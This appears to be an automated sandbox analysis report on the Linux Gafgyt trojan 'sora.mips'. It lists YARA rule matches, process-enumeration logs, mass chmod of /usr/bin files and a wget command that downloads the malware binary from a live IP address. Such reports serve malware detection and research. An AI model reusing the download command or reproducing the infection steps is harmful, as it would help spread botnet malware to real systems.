Source: 6229.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6221.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6418.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6412.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6414.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6227.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6218.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6220.1.00007f020c400000.00007f020c414000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6221, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6229, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: Process Memory Space: sora.mips PID: 6418, type: MEMORYSTR	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16

Source: classification engine

Classification label: mal68.spre.troj.evad.lin@0/1@0/0

Creates hidden files and/or directories

Source: /bin/sh (PID: 6213)	Directory: /usr/bin/.			Jump to behavior
Source: /usr/bin/curl (PID: 6214)	Directory: /root/.curlrc			Jump to behavior

Enumerates processes within the "proc" file system

Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/491/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/793/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/772/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/796/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/774/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/797/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/777/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/799/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/658/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/936/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/785/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/720/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/721/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/788/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/789/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/800/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/801/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/847/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6220)	File opened: /proc/904/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4331/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2033/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2033/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1582/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1582/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2275/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/3088/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6190/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6190/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1612/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1579/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1579/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1699/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1335/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1698/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2028/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1334/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1576/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1576/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2302/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2302/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/3236/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2025/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2146/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/910/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4444/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4445/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/912/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4446/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/6229/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/759/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/517/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/4447/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2307/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2307/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/918/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1594/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1594/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2285/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2285/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2281/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2281/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1349/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1349/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1623/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/761/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1622/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/884/exe	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/1983/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2038/fd	Jump to behavior
Source: /usr/bin/sora.mips (PID: 6226)	File opened: /proc/2038/exe	Jump to behavior

Executes the "chmod" command used to modify permissions

Source: /bin/sh (PID: 6217)

Jump to behavior

Executes the "curl" command used to transfer data via the network (typically using HTTP/S)

Source: /bin/sh (PID: 6214)

Curl executable: /usr/bin/curl -> curl cd /tmp

Jump to behavior

Executes the "rm" command used to delete files or directories

Source: /bin/sh (PID: 6233)

Jump to behavior

Executes the "wget" command typically used for HTTP/S downloading

Source: /bin/sh (PID: 6216)

Wget executable: /usr/bin/wget -> wget http://185.196.11.177/bins/sora.mips

Jump to behavior

Sample tries to set the executable flag

Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/2to3-2.7 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7z (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7za (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/7zr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/GET (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/HEAD (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/NF (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/POST (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Thunar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/VGAuthService (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/X (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/X11 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xephyr (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xorg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/Xwayland (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/[ (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aa-enabled (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aa-exec (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aconnect (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/acpi_listen (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/add-apt-repository (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/addpart (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/addr2line (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/al (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/al2 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsabat (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsaloop (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsamixer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsatplg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/alsaucm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/amidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/amixer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apg (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apgbfm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aplay (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aplaymidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-bug (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-cli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-collect (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apport-unpack (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/appres (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/appstreamcli (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aprofutil (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apropos (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-add-repository (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-cache (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-cdrom (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-config (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-extracttemplates (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-ftparchive (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-get (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-key (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-mark (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apt-sortpkgs (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aptdcon (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apturl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/apturl-gtk (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/ar (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arch (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arecord (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arecordmidi (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/arm2hpdl (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/as (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aseqdump (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aseqnet (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/asp-state4 (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aspell (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/aspell-import (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/at (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atobm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atq (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atril (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atril-previewer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atril-thumbnailer (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6217)	File: /usr/bin/atrm (bits: - usr: rwx grp: rwx all: rwx)	Jump to behavior
